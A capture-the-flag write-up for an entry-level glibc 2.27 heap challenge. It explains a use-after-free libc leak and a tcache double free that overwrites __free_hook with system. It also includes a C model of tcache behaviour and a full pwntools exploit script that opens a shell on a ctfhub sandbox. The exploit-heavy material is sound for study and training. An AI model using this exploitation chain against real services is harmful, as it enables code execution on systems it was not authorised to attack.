So far I am the only one who has solved this one; I guess the other experts could not be bothered with such a simple problem!
Long story short: when doing heap challenges you must debug them yourself!!! Debug!!! Debug!!! Important things are said three times.
Difficulty
Entry level, very simple.
Analysis
The challenge ships the libc version: libc 2.27.
The program never clears the stored pointer after a free, so every freed index can still be shown and freed again: there is both a UAF and a double free. The plan is as follows. Allocate eight chunks with request size 0x80 (0x90 chunks) plus a ninth, larger chunk holding "/bin/sh", allocated last so that the eighth chunk is not adjacent to the top chunk (otherwise freeing it would consolidate into top instead of entering the unsorted bin). Free the eight chunks in order: the first seven fill the 0x90 tcache bin, the eighth does not fit and goes to the unsorted bin, where its fd points at main_arena+96 (on 64-bit libc 2.27 main_arena starts 0x10 past __malloc_hook). Reading that chunk with show() leaks the pointer, from which the libc base is computed. Then use the double free to put the same chunk into the tcache twice, overwrite its next pointer with the address of __free_hook, allocate twice more to obtain a chunk at __free_hook, write the address of system there, and free the "/bin/sh" chunk to get a shell. This works because the tcache in 2.27 has no double-free detection (the key check that catches it was only added in glibc 2.29).
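To make the tcache mechanics described above concrete, here is an added example; it is not part of the original writeup and is neither the challenge binary nor the exploit. It is a small C model of one tcache bin that re-implements the lines of glibc's tcache_put/tcache_get that matter here, once with the 2.27 behaviour and once with the key check that 2.29 added, and replays the exploit's free/add sequence against it. The names `model_free`, `model_malloc`, `tcache_dup_attack`, `free_eight_chunks` and `fake_free_hook` are the example's own; `fake_free_hook` stands in for `__free_hook`, and the `system` address passed in is a placeholder value.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added illustration: a model of ONE glibc tcache bin (the 0x90 bin the
 * exploit uses) that re-implements the relevant lines of tcache_put /
 * tcache_get.  It never calls the real allocator, so the replay behaves the
 * same on any host.  glibc_minor == 27 models 2.27 (no double-free check);
 * glibc_minor >= 29 adds the `key` check that glibc 2.29 introduced. */

#define TCACHE_FILL_COUNT 7     /* mp_.tcache_count default */
#define CHUNK_WORDS 9           /* storage for a 0x90 chunk's user data */

typedef struct tcache_entry {
    struct tcache_entry *next;  /* 2.27: the only field in a free chunk */
    uintptr_t key;              /* 2.29+: set on put, cleared on get */
} tcache_entry;

enum free_result { FREED_TO_TCACHE, BIN_FULL, DOUBLE_FREE_ABORT };

static struct { int count; tcache_entry *head; } bin;  /* the 0x90 bin */
static tcache_entry chunks[8][CHUNK_WORDS];            /* chunks 0..7 */
static tcache_entry fake_free_hook;  /* stands in for __free_hook; .next is the hook slot */

static void model_reset(void) {
    memset(&bin, 0, sizeof bin);
    memset(chunks, 0, sizeof chunks);
    memset(&fake_free_hook, 0, sizeof fake_free_hook);
}

/* free()'s tcache path.  2.27: if the bin is not full, prepend, no questions
 * asked.  2.29+: a chunk whose key already carries the tcache cookie is
 * searched for in the bin, and free() aborts if it is found there. */
static enum free_result model_free(tcache_entry *e, int glibc_minor) {
    if (glibc_minor >= 29 && e->key == (uintptr_t)&bin) {
        for (tcache_entry *p = bin.head; p != NULL; p = p->next)
            if (p == e) return DOUBLE_FREE_ABORT; /* "double free detected in tcache 2" */
    }
    if (bin.count >= TCACHE_FILL_COUNT) return BIN_FULL; /* real glibc: unsorted/fast bin */
    e->next = bin.head;
    if (glibc_minor >= 29) e->key = (uintptr_t)&bin;
    bin.head = e;
    bin.count++;
    return FREED_TO_TCACHE;
}

/* malloc()'s tcache fast path: 2.27 takes it whenever head != NULL, without
 * looking at count or validating next, so a forged next is returned as-is. */
static tcache_entry *model_malloc(int glibc_minor) {
    tcache_entry *e = bin.head;
    if (e == NULL) return NULL;
    bin.head = e->next;
    bin.count--;
    if (glibc_minor >= 29) e->key = 0;
    return e;
}

/* Leak setup: seven frees fill the bin; the eighth does not fit and, in the
 * real allocator, goes to the unsorted bin with fd = main_arena+96. */
static enum free_result free_eight_chunks(int glibc_minor) {
    model_reset();
    enum free_result r = FREED_TO_TCACHE;
    for (int i = 0; i < 8; i++)
        r = model_free(chunks[i], glibc_minor);
    return r;                    /* BIN_FULL for chunk 7 */
}

/* The exploit's double-free primitive, replayed step by step:
 *   free(0); free(0)          -> bin: chunk0 -> chunk0
 *   add(0, p64(free_hook))    -> chunk0->next = &__free_hook
 *   add(9)                    -> chunk0 again, head = &__free_hook
 *   add(10, p64(system))      -> returns &__free_hook, system written there
 * Returns what the third malloc handed back, or NULL if free() aborted. */
static tcache_entry *tcache_dup_attack(int glibc_minor, uintptr_t system_addr) {
    model_reset();
    tcache_entry *chunk0 = chunks[0];
    model_free(chunk0, glibc_minor);                          /* free(0) */
    if (model_free(chunk0, glibc_minor) == DOUBLE_FREE_ABORT) /* free(0) again */
        return NULL;
    tcache_entry *a = model_malloc(glibc_minor);              /* add(0) */
    a->next = &fake_free_hook;                                /* p64(free_hook) */
    model_malloc(glibc_minor);                                /* add(9) */
    tcache_entry *c = model_malloc(glibc_minor);              /* add(10) */
    if (c == &fake_free_hook)
        c->next = (tcache_entry *)system_addr;                /* p64(system) */
    return c;
}

static uintptr_t free_hook_value(void) { return (uintptr_t)fake_free_hook.next; }

int main(void) {
    printf("2.27, 8th free: %s\n", free_eight_chunks(27) == BIN_FULL ? "bin full -> unsorted bin" : "?");
    tcache_entry *p = tcache_dup_attack(27, 0x7ffff7e4a420ULL);   /* placeholder system address */
    printf("2.27, 3rd malloc returned %s, hook = 0x%lx\n",
           p == &fake_free_hook ? "&__free_hook" : "other", (unsigned long)free_hook_value());
    printf("2.29: %s\n", tcache_dup_attack(29, 0) == NULL ? "second free() aborts" : "?");
    return 0;
}
```

The replay follows the exploit's index sequence exactly: the second free succeeds under the 2.27 rules because tcache_put only prepends, and the third malloc returns the hook address because tcache_get follows next without validating it. Under the 2.29 rules the same second free is refused, which is why this primitive stops working on newer libc and needs a different approach there.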
Final exploit
from pwn import *

context(log_level='debug', arch='amd64', os='linux')
pwnfile = "./chunk1"
io = remote("challenge-c1de9e72dce05941.sandbox.ctfhub.com", 28689)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.27_64.so")

def add(idx, size, data):
    io.recvuntil(b"Your choice: ")
    io.sendline(b"1")
    io.recvuntil(b"Give me a book ID: ")
    io.sendline(str(idx).encode())
    io.recvuntil(b"how long: ")
    io.sendline(str(size).encode())
    io.recvuntil(b"Content: ")
    io.send(data)

def show(idx):
    io.recvuntil(b"Your choice: ")
    io.sendline(b"2")
    io.recvuntil(b"Which book do you want to show?")
    io.sendline(str(idx).encode())

def free(idx):
    io.recvuntil(b"Your choice: ")
    io.sendline(b"3")
    io.recvuntil(b"Which one to throw?")
    io.sendline(str(idx).encode())

# Eight 0x90 chunks (request size 0x80) plus a larger guard chunk holding
# "/bin/sh": the guard keeps chunk 7 away from the top chunk so that freeing
# it later lands it in the unsorted bin instead of merging into top.
for i in range(7):
    add(i, 0x80, b"aaaa")
add(7, 0x80, b"aaaa")
add(8, 0x90, b"/bin/sh\x00")

# Chunks 0..6 fill the 0x90 tcache bin; chunk 7 goes to the unsorted bin.
for i in range(8):
    free(i)

# UAF: show() still works on the freed chunk 7, whose fd is the unsorted
# bin head at main_arena+96; main_arena sits 0x10 past __malloc_hook.
show(7)
io.recvuntil(b"Content: ")
libc_addr = u64(io.recv(6).ljust(8, b"\x00")) - 96 - 0x10 - libc.sym['__malloc_hook']
free_hook = libc_addr + libc.sym['__free_hook']
system_addr = libc_addr + libc.sym['system']
print("libc_addr-------------->:", hex(libc_addr))
print("free_hook-------------->:", hex(free_hook))

# Take six chunks back out of the tcache (LIFO: 6, 5, ..., 1) so that only
# chunk 0 is left in the bin, then free chunk 0 a second time (2.27 has no
# tcache double-free check) so the bin reads chunk0 -> chunk0.
for i in range(6):
    add(6 - i, 0x80, b"aaaa")
free(0)

# First malloc returns chunk 0; writing free_hook into it sets its next
# pointer. Second malloc returns chunk 0 again, third returns __free_hook,
# where the address of system is written.
add(0, 0x80, p64(free_hook))
add(9, 0x80, b"aaaa")
add(10, 0x80, p64(system_addr))

# free() now calls system("/bin/sh") on the guard chunk's content.
free(8)
io.interactive()